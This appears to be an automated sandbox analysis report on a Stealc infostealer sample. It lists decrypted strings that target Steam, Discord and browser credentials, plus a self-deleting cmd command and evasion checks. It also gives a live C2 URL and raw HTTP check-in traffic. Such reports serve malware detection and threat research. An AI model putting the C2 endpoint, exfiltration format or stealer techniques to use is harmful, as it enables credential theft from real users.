                Source: 0.2.file.exe.a30000.0.unpackString decryptor: token:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Software\Valve\Steam
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SteamPath
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: done
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: https
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: build
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: token
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: file
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: message
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A49030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00A49030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A372A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00A372A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00A3A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00A3A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00A3C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00A440F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00A3E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A3F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00A447C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A31710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00A3DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00A43B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A44B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00A3EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00A3BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A3DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49699 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 38 38 32 39 38 44 31 41 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="hwid"5F88298D1ABE2099925286------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="build"tale------AAKKKEBFCGDBGDGCFHCB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.7:49720
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.7:49944
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A362D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00A362D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 38 38 32 39 38 44 31 41 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="hwid"5F88298D1ABE2099925286------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="build"tale------AAKKKEBFCGDBGDGCFHCB--
                Source: file.exe, 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php//
                Source: file.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpID
                Source: file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpJ
                Source: file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpLMEM
                Source: file.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpQD
                Source: file.exe, 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpft
                Source: file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/sonation
                Source: file.exe, file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A700980_2_00A70098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E211C50_2_00E211C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8B1980_2_00A8B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A621380_2_00A62138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0E1000_2_00E0E100
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD82FC0_2_00DD82FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A742880_2_00A74288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8E2AE0_2_00E8E2AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9E2580_2_00A9E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAD39E0_2_00AAD39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABB3080_2_00ABB308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9D3010_2_00E9D301
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8D4FA0_2_00E8D4FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9D5A80_2_00A9D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A745A80_2_00A745A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A545730_2_00A54573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E5440_2_00A5E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE26D00_2_00DE26D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB96FD0_2_00AB96FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A766C80_2_00A766C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAA6480_2_00AAA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA67990_2_00AA6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8D7200_2_00A8D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8B8A80_2_00A8B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A898B80_2_00A898B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9B89D0_2_00E9B89D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9F8D60_2_00A9F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A848680_2_00A84868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E968310_2_00E96831
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1383A0_2_00E1383A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8C9630_2_00D8C963
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA4BA80_2_00AA4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA0B880_2_00AA0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98BD90_2_00A98BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAAC280_2_00AAAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F14C7F0_2_00F14C7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8FDE80_2_00E8FDE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A85DB90_2_00A85DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A84DC80_2_00A84DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E99D690_2_00E99D69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E94D6F0_2_00E94D6F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9AD380_2_00A9AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8BD680_2_00A8BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A61D780_2_00A61D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA1EE80_2_00AA1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A78E780_2_00A78E78
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A34610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: rcutauay ZLIB complexity 0.994974856856038
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00A49790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A43970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00A43970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\MTRP2XE4.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2159616 > 1048576
                Source: file.exeStatic PE information: Raw size of rcutauay is bigger than: 0x100000 < 0x1a4400
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.a30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rcutauay:EW;rnjpicgc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rcutauay:EW;rnjpicgc:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A49BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x21a765 should be: 0x2127d2
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: rcutauay
                Source: file.exeStatic PE information: section name: rnjpicgc
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F100E4 push edx; mov dword ptr [esp], 7FDD292Eh0_2_00F1011D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F100E4 push 2ACCDAC4h; mov dword ptr [esp], edx0_2_00F101C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F100E4 push 0161CD5Ch; mov dword ptr [esp], esi0_2_00F101EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBE0B3 push edx; mov dword ptr [esp], ecx0_2_00EBE0CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBE0B3 push 3D100E8Ah; mov dword ptr [esp], ebx0_2_00EBE0D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5A0DC push eax; retf 0_2_00A5A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB0053 push 51A4AA46h; mov dword ptr [esp], edi0_2_00EB007C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4F069 push ecx; mov dword ptr [esp], eax0_2_00D4F09F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4F069 push 4FEBE168h; mov dword ptr [esp], esp0_2_00D4F0A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4F069 push ebx; mov dword ptr [esp], ecx0_2_00D4F0CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4F069 push edx; mov dword ptr [esp], 212F5C51h0_2_00D4F0D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F2703B push esi; mov dword ptr [esp], ecx0_2_00F26F85
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F2703B push edi; mov dword ptr [esp], eax0_2_00F27060
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F55021 push ecx; mov dword ptr [esp], eax0_2_00F55055
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3900D push edx; mov dword ptr [esp], esi0_2_00F3902B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E211C5 push 4083E189h; mov dword ptr [esp], ebx0_2_00E2128B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E211C5 push 6CF881E9h; mov dword ptr [esp], eax0_2_00E2129C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E211C5 push ebp; mov dword ptr [esp], edx0_2_00E21375
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E211C5 push edx; mov dword ptr [esp], ebx0_2_00E213BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E211C5 push ebx; mov dword ptr [esp], edi0_2_00E21402
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED21AF push 6CAE7A00h; mov dword ptr [esp], edi0_2_00ED21DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F26194 push eax; mov dword ptr [esp], ecx0_2_00F261B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5A109 push eax; retf 0_2_00A5A119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9214A push edi; mov dword ptr [esp], ebx0_2_00F9216C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F09122 push ecx; mov dword ptr [esp], esp0_2_00F0916A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F02123 push ecx; mov dword ptr [esp], esi0_2_00F0217F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0E100 push edx; mov dword ptr [esp], ecx0_2_00E0E151
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0E100 push 4B25F8A7h; mov dword ptr [esp], ebp0_2_00E0E159
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0E100 push 17940D78h; mov dword ptr [esp], edx0_2_00E0E225
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0E100 push 1BBC947Dh; mov dword ptr [esp], edi0_2_00E0E23D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1D105 push 0E8A5FC2h; mov dword ptr [esp], edx0_2_00F1D13C
                Source: file.exeStatic PE information: section name: rcutauay entropy: 7.954004161213286

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A49BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37181
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3BB8 second address: EA3BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAB30D3D446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3BC2 second address: EA3BCE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnp 00007FAB30C06326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3BCE second address: EA3BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
